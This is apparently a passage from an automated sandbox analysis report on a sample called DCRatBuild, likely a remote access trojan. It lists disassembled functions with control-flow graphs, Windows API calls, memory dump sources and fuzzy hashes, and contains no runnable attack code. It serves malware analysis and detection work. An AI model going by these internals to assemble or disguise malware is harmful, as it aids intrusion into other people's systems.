                                                                                                                        • Opcode Fuzzy Hash: 5f155dc98f3b5b54339d69a04cb956f4174203261f74a405299f60af2fd74b61
                                                                                                                        • Instruction Fuzzy Hash: 6D51B3B08043809EEB20AF259844BAB7BE8AF67744F04042FF5D2976A1D77CD944C75E
                                                                                                                        Function 004BA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 913 4ba95b-4ba974 914 4ba98a-4ba98f 913->914 915 4ba976-4ba986 call 4bef4c 913->915 916 4ba99c-4ba9c0 MultiByteToWideChar 914->916 917 4ba991-4ba999 914->917 915->914 922 4ba988 915->922 920 4bab53-4bab66 call 4afbbc 916->920 921 4ba9c6-4ba9d2 916->921 917->916 923 4baa26 921->923 924 4ba9d4-4ba9e5 921->924 922->914 926 4baa28-4baa2a 923->926 927 4ba9e7-4ba9f6 call 4c2010 924->927 928 4baa04-4baa15 call 4b8e06 924->928 930 4bab48 926->930 931 4baa30-4baa43 MultiByteToWideChar 926->931 927->930 940 4ba9fc-4baa02 927->940 928->930 941 4baa1b 928->941 935 4bab4a-4bab51 call 4babc3 930->935 931->930 934 4baa49-4baa5b call 4baf6c 931->934 942 4baa60-4baa64 934->942 935->920 944 4baa21-4baa24 940->944 941->944 942->930 945 4baa6a-4baa71 942->945 944->926 946 4baaab-4baab7 945->946 947 4baa73-4baa78 945->947 949 4baab9-4baaca 946->949 950 4bab03 946->950 947->935 948 4baa7e-4baa80 947->948 948->930 951 4baa86-4baaa0 call 4baf6c 948->951 953 4baacc-4baadb call 4c2010 949->953 954 4baae5-4baaf6 call 4b8e06 949->954 952 4bab05-4bab07 950->952 951->935 968 4baaa6 951->968 958 4bab09-4bab22 call 4baf6c 952->958 959 4bab41-4bab47 call 4babc3 952->959 953->959 965 4baadd-4baae3 953->965 954->959 967 4baaf8 954->967 958->959 971 4bab24-4bab2b 958->971 959->930 970 4baafe-4bab01 965->970 967->970 968->930 970->952 972 4bab2d-4bab2e 971->972 973 4bab67-4bab6d 971->973 974 4bab2f-4bab3f WideCharToMultiByte 972->974 973->974 974->959 975 4bab6f-4bab76 call 4babc3 974->975 975->935
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,004B5695,004B5695,?,?,?,004BABAC,00000001,00000001,2DE85006), ref: 004BA9B5
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004BABAC,00000001,00000001,2DE85006,?,?,?), ref: 004BAA3B
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 004BAB35
                                                                                                                        • __freea.LIBCMT ref: 004BAB42
                                                                                                                          • Part of subcall function 004B8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BCA2C,00000000,?,004B6CBE,?,00000008,?,004B91E0,?,?,?), ref: 004B8E38
                                                                                                                        • __freea.LIBCMT ref: 004BAB4B
                                                                                                                        • __freea.LIBCMT ref: 004BAB70
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1414292761-0
                                                                                                                        • Opcode ID: 969bfbf2e7e80111229cf051f5627ddefdf1e9fdb1281f91482036dd89f88895
                                                                                                                        • Instruction ID: 00ea9fc6dca56e9202f63a35fa4d993d4716ff2ee0f2fd2f9c323221fa5b3edc
                                                                                                                        • Opcode Fuzzy Hash: 969bfbf2e7e80111229cf051f5627ddefdf1e9fdb1281f91482036dd89f88895
                                                                                                                        • Instruction Fuzzy Hash: C5510872600206AFDB258F65CC41EFBB7AADB44714F15462EFE14D6240DB38EC60C67A
                                                                                                                        Function 004B3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 978 4b3b72-4b3b7c 979 4b3bee-4b3bf1 978->979 980 4b3b7e-4b3b8c 979->980 981 4b3bf3 979->981 982 4b3b8e-4b3b91 980->982 983 4b3b95-4b3bb1 LoadLibraryExW 980->983 984 4b3bf5-4b3bf9 981->984 985 4b3c09-4b3c0b 982->985 986 4b3b93 982->986 987 4b3bfa-4b3c00 983->987 988 4b3bb3-4b3bbc GetLastError 983->988 985->984 989 4b3beb 986->989 987->985 992 4b3c02-4b3c03 FreeLibrary 987->992 990 4b3bbe-4b3bd3 call 4b6088 988->990 991 4b3be6-4b3be9 988->991 989->979 990->991 995 4b3bd5-4b3be4 LoadLibraryExW 990->995 991->989 992->985 995->987 995->991
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,004B3C35,?,?,004F2088,00000000,?,004B3D60,00000004,InitializeCriticalSectionEx,004C6394,InitializeCriticalSectionEx,00000000), ref: 004B3C03
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID: api-ms-
                                                                                                                        • API String ID: 3664257935-2084034818
                                                                                                                        • Opcode ID: 099a00acc9449620f6b566cc2645047b56438d5276786857926691cd9c4704be
                                                                                                                        • Instruction ID: 9f950c8c8e527d2314eb7b9b3d71c8a88bf21eece3bf379bfa0abd1038168d57
                                                                                                                        • Opcode Fuzzy Hash: 099a00acc9449620f6b566cc2645047b56438d5276786857926691cd9c4704be
                                                                                                                        • Instruction Fuzzy Hash: 1611E732A08220ABCB218F6A9C41BDA37649F01772F210562F915EB295D778FF0086ED
                                                                                                                        Function 004AAC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004A081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004A0836
                                                                                                                          • Part of subcall function 004A081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0049F2D8,Crypt32.dll,00000000,0049F35C,?,?,0049F33E,?,?,?), ref: 004A0858
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004AAC2F
                                                                                                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004AAC66
                                                                                                                        • SHGetMalloc.SHELL32(004D8438), ref: 004AAC70
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                        • String ID: riched20.dll$3Ro
                                                                                                                        • API String ID: 3498096277-3613677438
                                                                                                                        • Opcode ID: b0f668680cb77989fa8aac49c97627c152a4c10412598ac0091738fa04f00fa0
                                                                                                                        • Instruction ID: b69235b2238821d5aa98d946224c5e77cf78834eb86e25da4842a9e64e2789c2
                                                                                                                        • Opcode Fuzzy Hash: b0f668680cb77989fa8aac49c97627c152a4c10412598ac0091738fa04f00fa0
                                                                                                                        • Instruction Fuzzy Hash: E5F04471900109ABCB50AFA6D9499EFFBFCEF94705F00401BA415E2201DB785605CBA4
                                                                                                                        Function 004998E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1000 4998e0-499901 call 4aec50 1003 49990c 1000->1003 1004 499903-499906 1000->1004 1006 49990e-49991f 1003->1006 1004->1003 1005 499908-49990a 1004->1005 1005->1006 1007 499921 1006->1007 1008 499927-499931 1006->1008 1007->1008 1009 499933 1008->1009 1010 499936-499943 call 496edb 1008->1010 1009->1010 1013 49994b-49996a CreateFileW 1010->1013 1014 499945 1010->1014 1015 4999bb-4999bf 1013->1015 1016 49996c-49998e GetLastError call 49bb03 1013->1016 1014->1013 1017 4999c3-4999c6 1015->1017 1021 4999c8-4999cd 1016->1021 1022 499990-4999b3 CreateFileW GetLastError 1016->1022 1020 4999d9-4999de 1017->1020 1017->1021 1024 4999ff-499a10 1020->1024 1025 4999e0-4999e3 1020->1025 1021->1020 1023 4999cf 1021->1023 1022->1017 1026 4999b5-4999b9 1022->1026 1023->1020 1028 499a2e-499a39 1024->1028 1029 499a12-499a2a call 4a0602 1024->1029 1025->1024 1027 4999e5-4999f9 SetFileTime 1025->1027 1026->1017 1027->1024 1029->1028
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00497760,?,00000005,?,00000011), ref: 0049995F
                                                                                                                        • GetLastError.KERNEL32(?,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0049996C
                                                                                                                        • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00497760,?,00000005,?), ref: 004999A2
                                                                                                                        • GetLastError.KERNEL32(?,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004999AA
                                                                                                                        • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00497760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004999F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast$Time
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1999340476-0
                                                                                                                        • Opcode ID: da2c521dae5c654b574e9496bf367fb427906e2af6ed85a4ae321ff26186ee0c
                                                                                                                        • Instruction ID: a610cb5c5c7f23f87fc5353dd572340ca7006491d3698980d70235e2454c5ff1
                                                                                                                        • Opcode Fuzzy Hash: da2c521dae5c654b574e9496bf367fb427906e2af6ed85a4ae321ff26186ee0c
                                                                                                                        • Instruction Fuzzy Hash: 863125B15443416FEB209F29CC46BDABF94BB05324F100B2EF5A1963D0D3A9AD44CB99
                                                                                                                        Function 004AB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1059 4ab568-4ab581 PeekMessageW 1060 4ab5bc-4ab5be 1059->1060 1061 4ab583-4ab597 GetMessageW 1059->1061 1062 4ab5a8-4ab5b6 TranslateMessage DispatchMessageW 1061->1062 1063 4ab599-4ab5a6 IsDialogMessageW 1061->1063 1062->1060 1063->1060 1063->1062
                                                                                                                        APIs
                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004AB579
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004AB58A
                                                                                                                        • IsDialogMessageW.USER32(00010422,?), ref: 004AB59E
                                                                                                                        • TranslateMessage.USER32(?), ref: 004AB5AC
                                                                                                                        • DispatchMessageW.USER32(?), ref: 004AB5B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1266772231-0
                                                                                                                        • Opcode ID: cefdf04baddd1d5d08072902207d4115782c05a6c1177c734d282aaf6d3eb0cb
                                                                                                                        • Instruction ID: ba9a2c675f4cd3e34f89d526a034949ef1b0824e75b60f21e3bdb4e231158d81
                                                                                                                        • Opcode Fuzzy Hash: cefdf04baddd1d5d08072902207d4115782c05a6c1177c734d282aaf6d3eb0cb
                                                                                                                        • Instruction Fuzzy Hash: 99F0A971E0111ABACB209FA69C4CDEB7FACEE162957404426B505D2115EF28E615CBB8
                                                                                                                        Function 004AABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1064 4aabab-4aabca GetClassNameW 1065 4aabcc-4aabe1 call 4a1fbb 1064->1065 1066 4aabf2-4aabf4 1064->1066 1071 4aabe3-4aabef FindWindowExW 1065->1071 1072 4aabf1 1065->1072 1067 4aabff-4aac01 1066->1067 1068 4aabf6-4aabf9 SHAutoComplete 1066->1068 1068->1067 1071->1072 1072->1066
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000050), ref: 004AABC2
                                                                                                                        • SHAutoComplete.SHLWAPI(?,00000010), ref: 004AABF9
                                                                                                                          • Part of subcall function 004A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0049C116,00000000,.exe,?,?,00000800,?,?,?,004A8E3C), ref: 004A1FD1
                                                                                                                        • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 004AABE9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                        • String ID: EDIT
                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                        • Opcode ID: e42ad45ddeaa4d396691635f81142db0017f153b0c3656cff8f459eb6b344443
                                                                                                                        • Instruction ID: bc420bac1e59d70af2881312b1f36e0da7adcb3f2281c0ac0691cbaa5e80990f
                                                                                                                        • Opcode Fuzzy Hash: e42ad45ddeaa4d396691635f81142db0017f153b0c3656cff8f459eb6b344443
                                                                                                                        • Instruction Fuzzy Hash: C6F082326012287ADB205B259C09FAF766C9B57B41F484027BA05A22C4DB68EA91C5BE
                                                                                                                        Function 004ADBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1073 4adbde-4adc09 call 4aec50 SetEnvironmentVariableW call 4a0371 1077 4adc0e-4adc12 1073->1077 1078 4adc36-4adc38 1077->1078 1079 4adc14-4adc18 1077->1079 1080 4adc21-4adc28 call 4a048d 1079->1080 1083 4adc1a-4adc20 1080->1083 1084 4adc2a-4adc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1078
                                                                                                                        APIs
                                                                                                                        • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 004ADBF4
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 004ADC30
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentVariable
                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                        • API String ID: 1431749950-3493335439
                                                                                                                        • Opcode ID: 4b8249a773254779a16d64e129a6ddd6312a8bf3fb4f45ecb13bbf594436d8b8
                                                                                                                        • Instruction ID: abdf7b3c81e34f55a7b731abea13fcd82dc286e76ce4dd7f5a50ca60497d4b8d
                                                                                                                        • Opcode Fuzzy Hash: 4b8249a773254779a16d64e129a6ddd6312a8bf3fb4f45ecb13bbf594436d8b8
                                                                                                                        • Instruction Fuzzy Hash: 4FF0E4B18052247FCB201F968C05FFB7758EF257557440417BD4595151DAB89D40D6BC
                                                                                                                        Function 00499785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 1085 499785-499791 1086 49979e-4997b5 ReadFile 1085->1086 1087 499793-49979b GetStdHandle 1085->1087 1088 499811 1086->1088 1089 4997b7-4997c0 call 4998bc 1086->1089 1087->1086 1090 499814-499817 1088->1090 1093 4997d9-4997dd 1089->1093 1094 4997c2-4997ca 1089->1094 1095 4997df-4997e8 GetLastError 1093->1095 1096 4997ee-4997f2 1093->1096 1094->1093 1097 4997cc 1094->1097 1095->1096 1098 4997ea-4997ec 1095->1098 1099 49980c-49980f 1096->1099 1100 4997f4-4997fc 1096->1100 1101 4997cd-4997d7 call 499785 1097->1101 1098->1090 1099->1090 1100->1099 1102 4997fe-499807 GetLastError 1100->1102 1101->1090 1102->1099 1104 499809-49980a 1102->1104 1104->1101
                                                                                                                        APIs
                                                                                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00499795
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004997AD
                                                                                                                        • GetLastError.KERNEL32 ref: 004997DF
                                                                                                                        • GetLastError.KERNEL32 ref: 004997FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$FileHandleRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2244327787-0
                                                                                                                        • Opcode ID: bf9aa5eda6cc3ea7b24ae77fe159a18a1260a121eac763c79a2923cf0c7f2786
                                                                                                                        • Instruction ID: 4fb73f071db08631a37a039adf4bd1e926c063bdb56781b9046b109b1e11402e
                                                                                                                        • Opcode Fuzzy Hash: bf9aa5eda6cc3ea7b24ae77fe159a18a1260a121eac763c79a2923cf0c7f2786
                                                                                                                        • Instruction Fuzzy Hash: A211C631520204EBCF30AFADC804AAA3FA8FB06325F10853FF41685290DB798E44DB69
                                                                                                                        Function 004BAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,004B3F73,00000000,00000000,?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue), ref: 004BAD66
                                                                                                                        • GetLastError.KERNEL32(?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue,004C7970,FlsSetValue,00000000,00000364,?,004B98B7), ref: 004BAD72
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004BACDB,004B3F73,00000000,00000000,00000000,?,004BAED8,00000006,FlsSetValue,004C7970,FlsSetValue,00000000), ref: 004BAD80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3177248105-0
                                                                                                                        • Opcode ID: 9d19c87da650f02721125c2b81950bfa8cf715406e70e195a7f3c0e0c6c9b4b8
                                                                                                                        • Instruction ID: 8bb4b808ccd70a99e5081395376000e0094ee121768f1556ca7ef1c12b08bbb1
                                                                                                                        • Opcode Fuzzy Hash: 9d19c87da650f02721125c2b81950bfa8cf715406e70e195a7f3c0e0c6c9b4b8
                                                                                                                        • Instruction Fuzzy Hash: AE014732201222ABC7218F68DC44EDB7B5DEF407A37100231F906D3660CB28C822C6FA
                                                                                                                        Function 004BBA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004B97E5: GetLastError.KERNEL32(?,004D1030,004B4674,004D1030,?,?,004B3F73,00000050,?,004D1030,00000200), ref: 004B97E9
                                                                                                                          • Part of subcall function 004B97E5: _free.LIBCMT ref: 004B981C
                                                                                                                          • Part of subcall function 004B97E5: SetLastError.KERNEL32(00000000,?,004D1030,00000200), ref: 004B985D
                                                                                                                          • Part of subcall function 004B97E5: _abort.LIBCMT ref: 004B9863
                                                                                                                          • Part of subcall function 004BBB4E: _abort.LIBCMT ref: 004BBB80
                                                                                                                          • Part of subcall function 004BBB4E: _free.LIBCMT ref: 004BBBB4
                                                                                                                          • Part of subcall function 004BB7BB: GetOEMCP.KERNEL32(00000000,?,?,004BBA44,?), ref: 004BB7E6
                                                                                                                        • _free.LIBCMT ref: 004BBA9F
                                                                                                                        • _free.LIBCMT ref: 004BBAD5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
